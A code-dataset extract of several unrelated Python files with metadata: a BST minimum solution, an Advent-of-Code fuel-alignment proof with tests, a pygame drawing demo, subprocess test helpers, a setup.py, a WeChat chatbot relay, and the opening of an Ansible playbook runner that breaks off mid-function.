bst_min_value.py | alexhla/programming-problems-in-python | 0 | 6623876 | <reponame>alexhla/programming-problems-in-python<gh_stars>0
class Node:
    """Binary-tree node: a value plus left/right child links."""

    def __init__(self, x):
        """Create a leaf node holding *x* with no children."""
        self.val = x
        self.left = self.right = None
class Solution:
    """Binary-search-tree queries."""

    def bstmin(self, A):
        """Return the smallest value stored in the BST rooted at *A*.

        The minimum of a BST is its left-most node, so an iterative walk
        down the left links suffices -- no stack or extra state needed.
        Assumes *A* is a non-empty tree (not None).
        """
        # Idiom fix: compare to None with ``is not`` rather than ``!=``.
        while A.left is not None:
            A = A.left
        return A.val
# Build a small balanced BST and report its minimum value.
obj = Solution()
root = Node(4)
root.left = Node(2)
root.right = Node(6)
root.left.left = Node(1)
root.left.right = Node(3)
root.right.left = Node(5)
root.right.right = Node(7)
# Bug fix: bstmin() returns the minimum value, not a node count, so the
# old "Number of Tree Nodes is {}" message was wrong.
print("Minimum value in BST is {}".format(obj.bstmin(root)))
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def bstmin(self, A):
while A.left != None: # iterative solution will suffice
A = A.left # as no need to keep track of anything
return A.val # just traverse to left most node
obj = Solution()
root = Node(4)
root.left = Node(2)
root.right = Node(6)
root.left.left = Node(1)
root.left.right = Node(3)
root.right.left = Node(5)
root.right.right = Node(7)
print("Number of Tree Nodes is {}" .format(obj.bstmin(root))) | en | 0.969297 | # iterative solution will suffice # as no need to keep track of anything # just traverse to left most node | 3.807601 | 4 |
aoc-statistics.py | pavelrusakovich/statistics_showcase | 0 | 6623877 | #!/bin/python3
import random
from typing import List, Dict
from statistics import mean, median
from operator import itemgetter
from sys import maxsize
"""
Suppose, a = [a[0], a[1], ... a[n-1]] , a[i] is a real number
F(x) = sum( |a[i] - x| for i in (0..n-1) )
G(x) = sum( (a[i] - x)(a[i] - x - 1)/2 for i in (0..n-1) )
Part 1 - Minimize F(x) for real number x
Notice ,that |x| = x * sgn(x), where
sgn(x) = 1 if x > 0,
sgn(x) = 0 if x = 0,
sgn(x) = -1 if x < 0
sgn'(x) = 0 for all x except 0. For x = 0 sgn(x) is not differentiable.
Global minimum of F exists as for extremely large |x|, F(x) -> infinity.
Then Global minimum of F can be found among the points where F'(x) = 0 or doesn't exist.
F'(x) = sum( |a[i] - x| for i in (0..n-1) )' =
= sum( (a[i] - x) * sgn(a[i] - x) for i in (0..n-1) )' =
= sum( -1 * sgn(a[i] - x) + 0 for i in (0..n-1)) =
= sum( sgn(x - a[i]) for i in (0..n-1)) for all x where F'(x) is defined.
F'(x) is not defined whenever sgn(a[i] - x) = 0, so not defined for x in a,
thus, all a[i] are candidates for global minimum. However, we can disqualify any point that is not the local minimum.
Let's re-enumerate a[i] so that they are perfectly ordered and depict them on the X axis.
-----a[0]----a[1]----a[2]---...---a[n-2]----a[n-1]-----
Let's calculate the sign of F'(x) for every interval. This splits into two cases.
Case 1: n is odd. Let's assume n = 2m + 1.
-----a[0]----a[1]----a[2]----...----a[m-1]----a[m]----a[m+1]----...----a[n-2]----a[n-1]-----
2m+1 2m-1 2m-3 2m-5 3 1 -1 -3 3-2m 1-2m -2m-1 <- F'(x) for x in interval
From these calculations it's clear that a[m] is the only candidate for which F'(x) changes sign, so it's the only
local minimum of F, therefore, a global minimum. Notably, given the re-enumeration. a[m] is a sample median.
Case 2: n is even. Let's assume n = 2m.
-----a[0]----a[1]----a[2]----...----a[m-1]----a[m]----a[m+1]----...----a[n-2]----a[n-1]-----
2m 2m-2 2m-4 2m-6 4 2 0 -2 4-2m 2-2m -2m <- F'(x) for x in interval
F'(x) = 0 for entire interval ( a[m], a[m+1] ), so global minimum is in [ a[m], a[m+1] ] as all other candidates are
disqualified.
It appears, that in this case every point on that interval yields the global minimum:
To cut the proof short, I'll put some intuitively clear observations that will take too much time and space to proof
in rigorous way.
If a consists of two elements, b and c (c > b), min(F) is achieved for every b <= x <= c
If a consists of 2m elements, b, b,..b, c, c,..c (b and c repeat m times), then min(F) is achieved for every b <= x <= c
If a consists of 2m elements b-e[0], b-e[1], b-e[m-1], b, c, c+e[m+2], c+e[m+3], .. c+e[2m] (where e[i] > 0), then
since global minimum is achieved for some b <= x <= c, then at least,
elements less than b need to burn fuel to get to b and, likewise, all elements greater than c need to
burn fuel at least to get to c, after which the problem is reduced to the previous case.
Note: x = (b + c)/2 is by definition a median of even-sized sample.
######################################
Part 2 - Minimize G(x)
This is even easier, so I'll give less explanation here.
G(x) = sum( (a[i] - x)(a[i] - x - 1)/2 for i in (0..n-1) )
Global minimum exists, G is differentiable for all real x.
G'(x) = sum( -1* (a[i] - x - 1)/2 - (a[i] - x)/2 for i in (0..n-1) ) =
= sum( x - a[i] + 1/2 for i in (0..n-1) ) = n * x + sum( a[i]for i in (0..n-1) ) + n/2
G'(x) = 0 <=> x = (2 * sum( a[i]for i in (0..n-1) ) - n) / 2n = mean(a) - 1/2.
Note: answer is not exactly a mean due to discretization effect: for H(x) = sum( (a[i] - x)**2 for i in (0..n-1)),
minimum will be achieved exactly at mean.
Note: after the problem is solved in continuous form, translating it into discrete form is very easy,
but must not be overlooked.
"""
class RandomList:
    """Random sample of integer positions drawn from [lower_bound, upper_bound].

    Positions are kept both as a raw list (for mean/median) and as a
    position -> count dict so the fuel-burn sums cost O(#distinct positions).
    """

    length: int
    upper_bound: int
    lower_bound: int
    _items: List[int]
    _compressed_items: Dict

    def mean(self):
        """Discrete minimiser of the quadratic burn G(x): round(mean - 1/2)
        (see the module docstring for the derivation)."""
        return round(mean(self._items) - 1 / 2)

    def median(self):
        """Sample median -- the minimiser of the linear burn F(x)."""
        return median(self._items)

    def __init__(self, items_c, lo, hi):
        """Draw *items_c* positions uniformly from the inclusive range [lo, hi]."""
        self._items = []
        self._compressed_items = {}
        self.lower_bound = lo
        self.upper_bound = hi
        for _ in range(items_c):
            item = random.randint(lo, hi)
            self._items.append(item)
            # Counter-style tally of how many items sit at each position.
            self._compressed_items[item] = self._compressed_items.get(item, 0) + 1

    def linear_fuel_burn(self, target):
        """F(target): total |pos - target| over all sampled positions."""
        return sum(abs(pos - target) * count
                   for pos, count in self._compressed_items.items())

    def minimum_burn(self, func):
        """Brute-force minimum of *func* over every integer alignment point.

        Bug fix: the search now includes ``upper_bound`` itself -- the old
        ``range(lower_bound, upper_bound)`` skipped the top candidate and
        raised ValueError (empty sequence) whenever lo == hi.
        """
        return min(func(j) for j in range(self.lower_bound, self.upper_bound + 1))

    def arithmetic_progression_burn(self, target):
        """Burn where moving d steps costs |d*(d-1)/2| per unit count."""
        return sum(abs((pos - target) * (pos - target - 1) / 2) * count
                   for pos, count in self._compressed_items.items())

    def __str__(self):
        return str(self._items)
if __name__ == "__main__":
seed = random.randrange(maxsize)
print(f'Random seed: {seed}')
random.seed(seed)
for i in range(10):
size = random.randint(1, 100)
sample = RandomList(size, 0, random.randint(10, 1000))
passed = True
print(f' \nTEST {i + 1} \n List of {size} items: \n {sample}')
try:
assert (sample.minimum_burn(sample.linear_fuel_burn) == sample.linear_fuel_burn(sample.median()))
except AssertionError as e:
print(f'FAILED: Median was not the optimal alignment point for linear fuel consumption \n '
f'Median yields {sample.linear_fuel_burn(sample.median())}, '
f'optimum is {sample.minimum_burn(sample.linear_fuel_burn)}')
passed = False
try:
assert (sample.minimum_burn(sample.arithmetic_progression_burn) ==
sample.arithmetic_progression_burn(sample.mean()))
except AssertionError as e:
print(f'FAILED: "Mean" was not the optimal alignment point for arithmetic-progressive fuel consumption \n '
f'"Mean" yields {sample.arithmetic_progression_burn(sample.mean())}, '
f'optimum is {sample.minimum_burn(sample.arithmetic_progression_burn)} ')
passed = False
if passed:
print("PASSED")
| #!/bin/python3
import random
from typing import List, Dict
from statistics import mean, median
from operator import itemgetter
from sys import maxsize
"""
Suppose, a = [a[0], a[1], ... a[n-1]] , a[i] is a real number
F(x) = sum( |a[i] - x| for i in (0..n-1) )
G(x) = sum( (a[i] - x)(a[i] - x - 1)/2 for i in (0..n-1) )
Part 1 - Minimize F(x) for real number x
Notice ,that |x| = x * sgn(x), where
sgn(x) = 1 if x > 0,
sgn(x) = 0 if x = 0,
sgn(x) = -1 if x < 0
sgn'(x) = 0 for all x except 0. For x = 0 sgn(x) is not differentiable.
Global minimum of F exists as for extremely large |x|, F(x) -> infinity.
Then Global minimum of F can be found among the points where F'(x) = 0 or doesn't exist.
F'(x) = sum( |a[i] - x| for i in (0..n-1) )' =
= sum( (a[i] - x) * sgn(a[i] - x) for i in (0..n-1) )' =
= sum( -1 * sgn(a[i] - x) + 0 for i in (0..n-1)) =
= sum( sgn(x - a[i]) for i in (0..n-1)) for all x where F'(x) is defined.
F'(x) is not defined whenever sgn(a[i] - x) = 0, so not defined for x in a,
thus, all a[i] are candidates for global minimum. However, we can disqualify any point that is not the local minimum.
Let's re-enumerate a[i] so that they are perfectly ordered and depict them on the X axis.
-----a[0]----a[1]----a[2]---...---a[n-2]----a[n-1]-----
Let's calculate the sign of F'(x) for every interval. This splits into two cases.
Case 1: n is odd. Let's assume n = 2m + 1.
-----a[0]----a[1]----a[2]----...----a[m-1]----a[m]----a[m+1]----...----a[n-2]----a[n-1]-----
2m+1 2m-1 2m-3 2m-5 3 1 -1 -3 3-2m 1-2m -2m-1 <- F'(x) for x in interval
From these calculations it's clear that a[m] is the only candidate for which F'(x) changes sign, so it's the only
local minimum of F, therefore, a global minimum. Notably, given the re-enumeration. a[m] is a sample median.
Case 2: n is even. Let's assume n = 2m.
-----a[0]----a[1]----a[2]----...----a[m-1]----a[m]----a[m+1]----...----a[n-2]----a[n-1]-----
2m 2m-2 2m-4 2m-6 4 2 0 -2 4-2m 2-2m -2m <- F'(x) for x in interval
F'(x) = 0 for entire interval ( a[m], a[m+1] ), so global minimum is in [ a[m], a[m+1] ] as all other candidates are
disqualified.
It appears, that in this case every point on that interval yields the global minimum:
To cut the proof short, I'll put some intuitively clear observations that will take too much time and space to proof
in rigorous way.
If a consists of two elements, b and c (c > b), min(F) is achieved for every b <= x <= c
If a consists on 2m elements, b, b,..b, c, c,..c (b and c repeat m times), then min(F) is achieved for every b <= x <= c
If a consists of 2m elements b-e[0], b-e[1], b-e[m-1], b, c, c+e[m+2], c+e[m+3], .. c+e[2m] (where e[i] > 0), then
since global minimum is achieved for some b <= x <= c, then at least,
elements less than b need to burn fuel to get to b and, likewise, all elements greater than c need to
burn fuel at least to get to c, after which the problem is reduced to the previous case.
Note: x = (b + c)/2 is by definition a median of even-sized sample.
######################################
Part 2 - Minimize G(x)
This is even easier, so I'll give less explanation here.
G(x) = sum( (a[i] - x)(a[i] - x - 1)/2 for i in (0..n-1) )
Global minimum exists, G is differentiable for all real x.
G'(x) = sum( -1* (a[i] - x - 1)/2 - (a[i] - x)/2 for i in (0..n-1) ) =
= sum( x - a[i] + 1/2 for i in (0..n-1) ) = n * x + sum( a[i]for i in (0..n-1) ) + n/2
G'(x) = 0 <=> x = (2 * sum( a[i]for i in (0..n-1) ) - n) / 2n = mean(a) - 1/2.
Note: answer is not exactly a mean due to discretization effect: for H(x) = sum( (a[i] - x)**2 for i in (0..n-1)),
minimum will be achieved exactly at mean.
Note: after the problem is solved in continuous form, translating it into discrete form is very easy,
but must not be overlooked.
"""
class RandomList:
length: int
upper_bound: int
lower_bound: int
_items: List[int]
_compressed_items: Dict
def mean(self):
return round(mean(self._items) - 1 / 2)
def median(self):
return median(self._items)
def __init__(self, items_c, lo, hi):
self._items = []
self._compressed_items = {}
self.lower_bound = lo
self.upper_bound = hi
for i in range(items_c):
item = random.randint(lo, hi)
self._items.append(item)
if item in self._compressed_items:
self._compressed_items[item] += 1
else:
self._compressed_items[item] = 1
def linear_fuel_burn(self, target):
return sum(abs(pos - target) * count for pos, count in self._compressed_items.items())
def minimum_burn(self, func):
min_burn, pos_min_burn = min(
[(func(j), j) for j in range(self.lower_bound, self.upper_bound)]
, key=itemgetter(0))
return min_burn
def arithmetic_progression_burn(self, target):
return sum(
abs((pos - target) * (pos - target - 1) / 2) * count for pos, count in self._compressed_items.items())
def __str__(self):
return self._items.__str__()
if __name__ == "__main__":
seed = random.randrange(maxsize)
print(f'Random seed: {seed}')
random.seed(seed)
for i in range(10):
size = random.randint(1, 100)
sample = RandomList(size, 0, random.randint(10, 1000))
passed = True
print(f' \nTEST {i + 1} \n List of {size} items: \n {sample}')
try:
assert (sample.minimum_burn(sample.linear_fuel_burn) == sample.linear_fuel_burn(sample.median()))
except AssertionError as e:
print(f'FAILED: Median was not the optimal alignment point for linear fuel consumption \n '
f'Median yields {sample.linear_fuel_burn(sample.median())}, '
f'optimum is {sample.minimum_burn(sample.linear_fuel_burn)}')
passed = False
try:
assert (sample.minimum_burn(sample.arithmetic_progression_burn) ==
sample.arithmetic_progression_burn(sample.mean()))
except AssertionError as e:
print(f'FAILED: "Mean" was not the optimal alignment point for arithmetic-progressive fuel consumption \n '
f'"Mean" yields {sample.arithmetic_progression_burn(sample.mean())}, '
f'optimum is {sample.minimum_burn(sample.arithmetic_progression_burn)} ')
passed = False
if passed:
print("PASSED")
| en | 0.864837 | #!/bin/python3 Suppose, a = [a[0], a[1], ... a[n-1]] , a[i] is a real number F(x) = sum( |a[i] - x| for i in (0..n-1) ) G(x) = sum( (a[i] - x)(a[i] - x - 1)/2 for i in (0..n-1) ) Part 1 - Minimize F(x) for real number x Notice ,that |x| = x * sgn(x), where sgn(x) = 1 if x > 0, sgn(x) = 0 if x = 0, sgn(x) = -1 if x < 0 sgn'(x) = 0 for all x except 0. For x = 0 sgn(x) is not differentiable. Global minimum of F exists as for extremely large |x|, F(x) -> infinity. Then Global minimum of F can be found among the points where F'(x) = 0 or doesn't exist. F'(x) = sum( |a[i] - x| for i in (0..n-1) )' = = sum( (a[i] - x) * sgn(a[i] - x) for i in (0..n-1) )' = = sum( -1 * sgn(a[i] - x) + 0 for i in (0..n-1)) = = sum( sgn(x - a[i]) for i in (0..n-1)) for all x where F'(x) is defined. F'(x) is not defined whenever sgn(a[i] - x) = 0, so not defined for x in a, thus, all a[i] are candidates for global minimum. However, we can disqualify any point that is not the local minimum. Let's re-enumerate a[i] so that they are perfectly ordered and depict them on the X axis. -----a[0]----a[1]----a[2]---...---a[n-2]----a[n-1]----- Let's calculate the sign of F'(x) for every interval. This splits into two cases. Case 1: n is odd. Let's assume n = 2m + 1. -----a[0]----a[1]----a[2]----...----a[m-1]----a[m]----a[m+1]----...----a[n-2]----a[n-1]----- 2m+1 2m-1 2m-3 2m-5 3 1 -1 -3 3-2m 1-2m -2m-1 <- F'(x) for x in interval From these calculations it's clear that a[m] is the only candidate for which F'(x) changes sign, so it's the only local minimum of F, therefore, a global minimum. Notably, given the re-enumeration. a[m] is a sample median. Case 2: n is even. Let's assume n = 2m. -----a[0]----a[1]----a[2]----...----a[m-1]----a[m]----a[m+1]----...----a[n-2]----a[n-1]----- 2m 2m-2 2m-4 2m-6 4 2 0 -2 4-2m 2-2m -2m <- F'(x) for x in interval F'(x) = 0 for entire interval ( a[m], a[m+1] ), so global minimum is in [ a[m], a[m+1] ] as all other candidates are disqualified. 
It appears, that in this case every point on that interval yields the global minimum: To cut the proof short, I'll put some intuitively clear observations that will take too much time and space to proof in rigorous way. If a consists of two elements, b and c (c > b), min(F) is achieved for every b <= x <= c If a consists on 2m elements, b, b,..b, c, c,..c (b and c repeat m times), then min(F) is achieved for every b <= x <= c If a consists of 2m elements b-e[0], b-e[1], b-e[m-1], b, c, c+e[m+2], c+e[m+3], .. c+e[2m] (where e[i] > 0), then since global minimum is achieved for some b <= x <= c, then at least, elements less than b need to burn fuel to get to b and, likewise, all elements greater than c need to burn fuel at least to get to c, after which the problem is reduced to the previous case. Note: x = (b + c)/2 is by definition a median of even-sized sample. ###################################### Part 2 - Minimize G(x) This is even easier, so I'll give less explanation here. G(x) = sum( (a[i] - x)(a[i] - x - 1)/2 for i in (0..n-1) ) Global minimum exists, G is differentiable for all real x. G'(x) = sum( -1* (a[i] - x - 1)/2 - (a[i] - x)/2 for i in (0..n-1) ) = = sum( x - a[i] + 1/2 for i in (0..n-1) ) = n * x + sum( a[i]for i in (0..n-1) ) + n/2 G'(x) = 0 <=> x = (2 * sum( a[i]for i in (0..n-1) ) - n) / 2n = mean(a) - 1/2. Note: answer is not exactly a mean due to discretization effect: for H(x) = sum( (a[i] - x)**2 for i in (0..n-1)), minimum will be achieved exactly at mean. Note: after the problem is solved in continuous form, translating it into discrete form is very easy, but must not be overlooked. | 3.357241 | 3 |
Section 4/Video1_3_draw.py | PacktPublishing/-Learn-Python-Programming-with-Games | 3 | 6623878 | <reponame>PacktPublishing/-Learn-Python-Programming-with-Games<gh_stars>1-10
'''
Created on Sep 2, 2018
@author: <NAME>
Space background image was downloaded from:
--------------------------------------
https://opengameart.org
No attribution required for this png file.
'''
import pygame
from pygame.locals import *
from os import path
# Module-level pygame initialisation and drawing constants.
pygame.init()
pygame.display.set_caption('PyGame - Starships and Asteroids game')
WIDTH, HEIGHT = 900, 600 # <== adjust size to your liking
game_surface = pygame.display.set_mode((WIDTH, HEIGHT))
fps_clock = pygame.time.Clock() # create clock instance
FPS = 60 # frames per second
green = pygame.Color('green') # define color
# line corner coordinates
# NOTE(review): the *_X / *_Y names actually hold (x, y) corner POINTS, and
# e.g. LEFT_BOTTOM_Y is really the bottom-RIGHT corner -- consider renaming.
LEFT_BOTTOM_X = (10, HEIGHT -10)
LEFT_BOTTOM_Y = (WIDTH -10, HEIGHT -10)
LEFT_TOP_X = (100, 10)
LEFT_TOP_Y = (WIDTH - 100, 10)
BOTTOM_LINE = (LEFT_BOTTOM_X, LEFT_BOTTOM_Y) # tuple of coordinates
TOP_LINE = (LEFT_TOP_X, LEFT_TOP_Y)
LEFT_LINE = (LEFT_BOTTOM_X, LEFT_TOP_X)
RIGHT_LINE = (LEFT_BOTTOM_Y, LEFT_TOP_Y)
def run_3d_game():
    """Run the demo loop: draw a green trapezoid outline over a space
    background until the window is closed."""
    bg_img = pygame.image.load(path.join('images', 'space_background.png'))
    game_surface.blit(bg_img, (0, 0))
    # game loop ------------------------------------------------------------
    run_game = True
    while run_game:
        fps_clock.tick(FPS)  # cap the loop at FPS frames per second
        for event in pygame.event.get():
            if event.type == QUIT:
                run_game = False
        # Redraw the background each frame, then the four trapezoid edges.
        game_surface.blit(bg_img, (0, 0))
        pygame.draw.line(game_surface, green, *BOTTOM_LINE, 10) # use * to unpack tuple for (start_pos, end_pos)
        pygame.draw.line(game_surface, green, *TOP_LINE, 6) # line(Surface, color, start_pos, end_pos, width=1) -> Rect
        pygame.draw.line(game_surface, green, *LEFT_LINE, 6)
        pygame.draw.line(game_surface, green, *RIGHT_LINE, 6)
        pygame.display.update()
    # End game loop --------------------------------------------------------
    pygame.quit()
# Run the demo only when this file is executed directly.
if __name__ == '__main__':
    run_3d_game()
| '''
Created on Sep 2, 2018
@author: <NAME>
Space background image was downloaded from:
--------------------------------------
https://opengameart.org
No attribution required for this png file.
'''
import pygame
from pygame.locals import *
from os import path
pygame.init()
pygame.display.set_caption('PyGame - Starships and Asteroids game')
WIDTH, HEIGHT = 900, 600 # <== adjust size to your liking
game_surface = pygame.display.set_mode((WIDTH, HEIGHT))
fps_clock = pygame.time.Clock() # create clock instance
FPS = 60 # frames per second
green = pygame.Color('green') # define color
# line corner coordinates
LEFT_BOTTOM_X = (10, HEIGHT -10)
LEFT_BOTTOM_Y = (WIDTH -10, HEIGHT -10)
LEFT_TOP_X = (100, 10)
LEFT_TOP_Y = (WIDTH - 100, 10)
BOTTOM_LINE = (LEFT_BOTTOM_X, LEFT_BOTTOM_Y) # tuple of coordinates
TOP_LINE = (LEFT_TOP_X, LEFT_TOP_Y)
LEFT_LINE = (LEFT_BOTTOM_X, LEFT_TOP_X)
RIGHT_LINE = (LEFT_BOTTOM_Y, LEFT_TOP_Y)
def run_3d_game():
bg_img = pygame.image.load(path.join('images', 'space_background.png'))
game_surface.blit(bg_img, (0, 0))
# game loop ------------------------------------------------------------
run_game = True
while run_game:
fps_clock.tick(FPS)
for event in pygame.event.get():
if event.type == QUIT:
run_game = False
game_surface.blit(bg_img, (0, 0))
pygame.draw.line(game_surface, green, *BOTTOM_LINE, 10) # use * to unpack tuple for (start_pos, end_pos)
pygame.draw.line(game_surface, green, *TOP_LINE, 6) # line(Surface, color, start_pos, end_pos, width=1) -> Rect
pygame.draw.line(game_surface, green, *LEFT_LINE, 6)
pygame.draw.line(game_surface, green, *RIGHT_LINE, 6)
pygame.display.update()
# End game loop --------------------------------------------------------
pygame.quit()
if __name__ == '__main__':
run_3d_game() | en | 0.568182 | Created on Sep 2, 2018 @author: <NAME> Space background image was downloaded from: -------------------------------------- https://opengameart.org No attribution required for this png file. # <== adjust size to your liking # create clock instance # frames per second # define color # line corner coordinates # tuple of coordinates # game loop ------------------------------------------------------------ # use * to unpack tuple for (start_pos, end_pos) # line(Surface, color, start_pos, end_pos, width=1) -> Rect # End game loop -------------------------------------------------------- | 2.930305 | 3 |
tests/helpers.py | J-Obog/littlekv | 4 | 6623879 | from typing import Tuple
import subprocess
import time
import os
import signal
import sys
def launch_client_proc(cmd: str, conn_delay: float = 0.25) -> Tuple[int, int, str]:
    """Start *cmd* as a client process after *conn_delay* seconds and wait for it.

    Returns (pid, exit_code, stripped stdout as text).

    Bug fix: uses ``communicate()`` instead of ``wait()`` followed by
    ``communicate()`` -- waiting first with a PIPE'd stdout can deadlock if
    the child fills the pipe buffer before exiting.  (The ``conn_delay``
    annotation is also corrected from int to float.)
    """
    time.sleep(conn_delay)  # give the server time to come up first
    client_proc = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)
    stdout, _ = client_proc.communicate()
    output = stdout.decode('utf-8').strip()
    return (client_proc.pid, client_proc.returncode, output)
def launch_server_proc(cmd: str) -> int:
    """Start *cmd* as a background server process and return its pid.

    The process is not waited on; pair with kill_server_proc() for teardown.
    (Return annotation corrected: the function returns an int pid, not a tuple.)
    """
    server_proc = subprocess.Popen(cmd.split())
    return server_proc.pid
def kill_server_proc(pid: int, timeout: float = 0.25):
    """Send an interrupt (Ctrl-C equivalent) to process *pid*, then wait
    *timeout* seconds for it to shut down.

    On Windows a CTRL_C_EVENT is delivered; on other platforms SIGINT.
    (The ``pid`` annotation is corrected from str to int -- os.kill takes
    an integer pid.)
    """
    if sys.platform.startswith('win'):  # clearer than sys.platform[:-2] == 'win'
        os.kill(pid, signal.CTRL_C_EVENT)
    else:
        os.kill(pid, signal.SIGINT)
    time.sleep(timeout)
import subprocess
import time
import os
import signal
import sys
def launch_client_proc(cmd: str, conn_delay: int = 0.25) -> Tuple[int, int, str]:
time.sleep(conn_delay)
client_proc = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)
exit_code = client_proc.wait()
output = client_proc.communicate()[0].decode('utf-8').strip()
return (client_proc.pid, exit_code, output)
def launch_server_proc(cmd: str) -> int:
    """Spawn *cmd* as a server process in the background.

    Returns the PID of the new process (previously mis-annotated as
    ``Tuple[int]``); stop it later with :func:`kill_server_proc`.
    """
    server_proc = subprocess.Popen(cmd.split())
    return server_proc.pid
def kill_server_proc(pid: int, timeout: float = 0.25):
    """Send a Ctrl-C style interrupt to process *pid* and pause briefly.

    Uses CTRL_C_EVENT on Windows and SIGINT on POSIX. Fixes the wrong
    ``pid: str`` / ``timeout: int`` annotations and replaces the brittle
    ``sys.platform[:-2] == 'win'`` slice with ``startswith('win')``.
    """
    if sys.platform.startswith('win'):
        os.kill(pid, signal.CTRL_C_EVENT)
    else:
        os.kill(pid, signal.SIGINT)
    time.sleep(timeout)
setup.py | hasangchun/sports_news_collector | 5 | 6623880 | from setuptools import setup, find_packages
# Use the project README verbatim as the long description shown on PyPI.
with open('README.md', encoding='utf-8') as f:
    long_description = f.read()
setup(
    name='sports_news_collector',
    version='0.1',
    description='Provide services by collecting various sports news',
    long_description=long_description,
    long_description_content_type='text/markdown',
    author='<NAME>',
    author_email='<EMAIL>',
    url='https://github.com/hasangchun/sports_news_collector',
    # Runtime dependencies of the collector.
    install_requires=[
        'beautifulsoup4',
        'requests',
        'pretty_html_table',
        'pandas',
        'pororo',
    ],
    packages=find_packages(exclude=[]),
    python_requires='>=3',
    package_data={},
    zip_safe=False,
    # Trove classifiers displayed on PyPI.
    # NOTE(review): classifiers advertise 3.2+ while python_requires only
    # says '>=3' -- confirm which minor versions are actually supported.
    classifiers=[
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
    ],
)
with open('README.md', encoding='utf-8') as f:
long_description = f.read()
setup(
name='sports_news_collector',
version='0.1',
description='Provide services by collecting various sports news',
long_description=long_description,
long_description_content_type='text/markdown',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/hasangchun/sports_news_collector',
install_requires=[
'beautifulsoup4',
'requests',
'pretty_html_table',
'pandas',
'pororo',
],
packages=find_packages(exclude=[]),
python_requires='>=3',
package_data={},
zip_safe=False,
classifiers=[
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
) | none | 1 | 1.26374 | 1 | |
mod/units/play.py | HeraldStudio/wechat | 1 | 6623881 | <reponame>HeraldStudio/wechat
# -*- coding: utf-8 -*-
# @Date : 2014-07-05 22:43:49
# @Author : <EMAIL> <EMAIL>
from tornado.httpclient import HTTPRequest, HTTPClient, HTTPError
from config import SERVICE, TIME_OUT, DEFAULT_UUID
from get_api_return import error_map
import urllib
def update(db, user):
    """Toggle the user's play state (0 <-> 1) and persist it.

    Returns a greeting when the game is entered, a farewell when it is
    left, and an apology string when the DB commit fails (the session is
    rolled back). For any other state value ``None`` is returned,
    matching the historical behaviour.
    """
    if user.state == 0:
        user.state = 1
        reply = u'come on!'
    elif user.state == 1:
        user.state = 0
        reply = u'bye~~'
    else:
        return None
    try:
        db.commit()
        return reply
    # Was a bare `except:` -- narrowed so SystemExit/KeyboardInterrupt
    # are no longer swallowed; the duplicated commit/rollback branches
    # are also collapsed into one.
    except Exception:
        db.rollback()
        return u'T T 出了点小问题,要不你再试试?'
def simsimi(content, user):
    """Relay *content* to the simsimi chat service and return its reply.

    Falls back to DEFAULT_UUID when the user has no uuid, maps HTTP
    failures through ``error_map`` and returns a canned message when the
    service itself reports an error.
    """
    client = HTTPClient()
    uuid = user.uuid or DEFAULT_UUID
    payload = urllib.urlencode({'uuid': uuid, 'msg': content.encode('utf-8')})
    req = HTTPRequest(SERVICE + 'simsimi', method='POST',
                      body=payload, request_timeout=TIME_OUT)
    try:
        resp = client.fetch(req)
    except HTTPError as err:
        return error_map[err.code]
    return u'=。= 坏掉了' if resp.body == 'error' else resp.body
| # -*- coding: utf-8 -*-
# @Date : 2014-07-05 22:43:49
# @Author : <EMAIL> <EMAIL>
from tornado.httpclient import HTTPRequest, HTTPClient, HTTPError
from config import SERVICE, TIME_OUT, DEFAULT_UUID
from get_api_return import error_map
import urllib
def update(db, user):
    """Flip the user's play state between 0 and 1 and commit the change.

    Returns a start message, a goodbye message, or an apology if the
    commit fails (after rolling back). States other than 0/1 yield
    ``None``, as before.
    """
    if user.state == 0:
        user.state = 1
        reply = u'come on!'
    elif user.state == 1:
        user.state = 0
        reply = u'bye~~'
    else:
        return None
    try:
        db.commit()
        return reply
    except Exception:  # was a bare except: -- keep SystemExit/KeyboardInterrupt fatal
        db.rollback()
        return u'T T 出了点小问题,要不你再试试?'
def simsimi(content, user):
    """Forward *content* to the simsimi service, returning the chat reply.

    Uses DEFAULT_UUID for users without a uuid; HTTP errors are mapped
    via ``error_map`` and a service-side 'error' body yields a fixed
    fallback message.
    """
    http = HTTPClient()
    effective_uuid = user.uuid if user.uuid else DEFAULT_UUID
    body = urllib.urlencode({
        'msg': content.encode('utf-8'),
        'uuid': effective_uuid,
    })
    try:
        reply = http.fetch(HTTPRequest(SERVICE + 'simsimi', method='POST',
                                       body=body, request_timeout=TIME_OUT))
    except HTTPError as err:
        return error_map[err.code]
    if reply.body == 'error':
        return u'=。= 坏掉了'
    return reply.body
xos/synchronizers/new_base/ansible_main.py | iecedge/xos | 0 | 6623882 | <gh_stars>0
# Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pickle
import sys
# import json
import traceback
from xosconfig import Config
sys.path.append("/opt/xos")
def run_playbook(ansible_hosts, ansible_config, fqp, opts):
    # Run the playbook at `fqp` (fully-qualified path) with `opts` as run data.
    # Ansible reads its config/hosts from the environment, so both variables
    # are exported -- or scrubbed -- before ansible_runner is (re)imported.
    # Returns {"stats": ..., "aresults": ...}; on any failure both are None
    # and "exception" carries the formatted traceback instead.
    try:
        if ansible_config:
            os.environ["ANSIBLE_CONFIG"] = ansible_config
        else:
            # No config requested: make sure a stale value is not inherited.
            try:
                del os.environ["ANSIBLE_CONFIG"]
            except KeyError:
                pass
        if ansible_hosts:
            os.environ["ANSIBLE_HOSTS"] = ansible_hosts
        else:
            # Same scrubbing for the hosts file variable.
            try:
                del os.environ["ANSIBLE_HOSTS"]
            except KeyError:
                pass
